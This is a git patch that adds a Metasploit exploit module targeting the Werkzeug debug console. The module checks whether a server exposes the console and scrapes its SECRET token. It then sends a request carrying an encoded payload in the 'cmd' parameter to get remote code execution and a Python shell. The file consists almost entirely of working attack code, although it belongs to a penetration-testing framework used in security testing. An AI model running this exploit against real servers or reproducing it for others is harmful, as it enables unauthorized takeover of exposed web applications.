From bff92f2304cc466bf79d429b7cc45cc354b56429 Mon Sep 17 00:00:00 2001 From: h00die Date: Fri, 10 Jul 2015 21:13:12 -0400 Subject: [PATCH] Initial add --- .../exploits/multi/http/werkzeug_debug_rce.rb | 79 +++++++++++++++++++ 1 file changed, 79 insertions(+) diff --git a/modules/exploits/multi/http/werkzeug_debug_rce.rb b/modules/exploits/multi/http/werkzeug_debug_rce.rb index e69de29bb2..3a9433fcf7 100644 --- a/modules/exploits/multi/http/werkzeug_debug_rce.rb +++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb @@ -0,0 +1,79 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rex' + +class Metasploit4 < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::HttpClient + + def initialize + super( + 'Name' => 'Werkzeug Debug Shell Command Execution', + 'Description' => %q{ + This module will exploit the Werkzeug debug console to put down a + python shell. This debugger "must never be used on production + machines", but sometimes slips passed testing. + Tested against: + 0.9.6 on Debian + 0.10 on CentOS + }, + 'Author' => 'h00die ', + 'References' => + [ + [ 'Website', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger'] + ], + 'License' => MSF_LICENSE, + 'Platform' => ['python'], + 'Targets' => [[ 'werkzeug 0.10 and older', { }]], + 'Arch' => ARCH_PYTHON, + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jun 28 2015', + ) + register_options( + [ + OptString.new('URI',[true,'URI to the console','/console']) + ], self.class + ) + end + + def check + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(datastore['URI']) + }) + #https://github.com/mitsuhiko/werkzeug/blob/master/werkzeug/debug/tbtools.py#L67 + if (res and res.body =~ /Brought to you by DON'T PANIC<\/strong>, your\n friendly Werkzeug powered traceback interpreter./) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe + end + + def exploit + #first we need to get the SECRET code + secret = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(datastore['URI']) + }) + if (secret and secret.body =~ /SECRET = "([a-zA-Z0-9]{20})";/) + secret = secret.body.match(/SECRET = "([a-zA-Z0-9]{20})";/).captures[0] + vprint_status("Secret Code: #{secret}") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(datastore['URI']), + 'vars_get' => { + '__debugger__' => 'yes', + 'cmd' => payload.encoded, + 'frm' => '0', + 's' => secret + } + }) + else + print_error("Secret code not detected.") + end + end +end +